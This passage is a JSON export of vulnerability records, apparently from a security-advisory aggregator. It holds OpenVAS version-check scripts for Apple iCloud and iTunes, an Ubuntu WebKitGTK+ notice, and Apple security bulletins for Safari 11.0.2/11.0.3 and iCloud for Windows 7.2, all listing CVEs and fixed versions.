vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - A privacy issue existed in the use of client certificates.\n\n - Multiple memory corruption issues.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attacker to track a user and also\n arbitrary code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208328\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:vers, test_version:\"7.2\"))\n{\n report = report_fixed_ver( installed_version:vers, fixed_version:\"7.2\", install_path:path );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:40", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-12-28T00:00:00", "type": "openvas", "title": "Apple iTunes Security Updates( HT208326 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-7157"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310812285", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812285", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates( HT208326 )\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812285\");\n script_version(\"2019-05-17T13:14:58+0000\");\n script_cve_id(\"CVE-2017-13864\", \"CVE-2017-13866\", \"CVE-2017-13856\", \"CVE-2017-13870\",\n \"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-7160\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 13:14:58 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-28 14:47:56 +0530 (Thu, 28 Dec 2017)\");\n script_name(\"Apple iTunes Security Updates( HT208326 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple memory corruption issues.\n\n - A privacy issue existed in the use of client certificates.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to track users by\n leveraging mishandling of client certificates and also execute arbitrary code\n or cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.7.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.7.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208326\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nituneVer = infos['version'];\npath = infos['location'];\n\n##12.7.2 == 12.7.2.58\nif(version_is_less(version:ituneVer, test_version:\"12.7.2.58\"))\n{\n report = report_fixed_ver(installed_version:ituneVer, fixed_version:\"12.7.2\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2022-01-04T12:02:04", "description": "Multiple security issues were discovered in the WebKitGTK+ Web and \nJavaScript engines. If a user were tricked in to opening a specially \ncrafted website, an attacker could potentially exploit these to cause a \ndenial of service, spoof the user interface, or execute arbitrary code. \n(CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160, \nCVE-2017-7161, CVE-2017-7165, CVE-2017-13884, CVE-2017-13885)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-30T00:00:00", "type": "ubuntu", "title": "WebKitGTK+ vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2018-4088", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7165", "CVE-2018-4096", "CVE-2017-7160", "CVE-2017-7161"], "modified": "2018-01-30T00:00:00", "id": "USN-3551-1", "href": "https://ubuntu.com/security/notices/USN-3551-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "apple": [{"lastseen": "2021-11-10T17:00:36", "description": "# About the security content of Safari 11.0.2\n\nThis document describes the security content of Safari 11.0.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 11.0.2\n\nReleased December 6, 2017\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit Web Inspector**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A command injection issue existed in Web Inspector. This issue was addressed through improved escaping of special characters.\n\nCVE-2017-7161: Mitin Svyat\n\nEntry added January 10, 2018\n\n\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 09, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "apple", "title": "About the security content of Safari 11.0.2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165"], "modified": "2017-12-06T00:00:00", "id": "APPLE:05865687B681A94EDACF5CD84F56F0EF", "href": "https://support.apple.com/kb/HT208324", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:44:24", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 11.0.2\n\nReleased December 6, 2017\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit Web Inspector**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A command injection issue existed in Web Inspector. This issue was addressed through improved escaping of special characters.\n\nCVE-2017-7161: Mitin Svyat\n\nEntry added January 10, 2018\n\n\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-09T04:06:11", "title": "About the security content of Safari 11.0.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7161", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7165", "CVE-2017-13870", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2018-04-09T04:06:11", "id": "APPLE:HT208324", "href": "https://support.apple.com/kb/HT208324", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:47", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 7.2\n\nReleased December 13, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. \n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-25T06:02:26", "title": "About the security content of iCloud for Windows 7.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13870", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2018-01-25T06:02:26", "id": "APPLE:HT208328", "href": "https://support.apple.com/kb/HT208328", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:35", "description": "# About the security content of iCloud for Windows 7.2\n\nThis document describes the security content of iCloud for Windows 7.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 7.2\n\nReleased December 13, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position could track a user\n\nDescription: A privacy issue existed in the use of client certificates. This issue was addressed through a revised protocol. \n\nCVE-2017-13864: FURIOUSMAC Team of United States Naval Academy\n\nEntry updated December 21, 2017\n\n**CFNetwork Session**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: January 25, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-13T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 7.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13864", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7165", "CVE-2017-7172"], "modified": "2017-12-13T00:00:00", "id": "APPLE:D5B2B0A52189C378A357D40438F75CF8", "href": "https://support.apple.com/kb/HT208328", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:33", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 11.0.3\n\nReleased January 23, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.3\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4088: Jeonghoon Shin of Theori\n\nCVE-2018-4089: Ivan Fratric of Google Project Zero\n\nCVE-2018-4096: found by OSS-Fuzz\n\nCVE-2018-4147: found by OSS-Fuzz\n\nCVE-2017-7830: Jun Kokatsu (@shhnjk)\n\nEntry updated October 18, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T05:51:25", "title": "About the security content of Safari 11.0.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4147", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4089", "CVE-2017-7830"], "modified": "2018-10-18T05:51:25", "id": "APPLE:HT208475", "href": 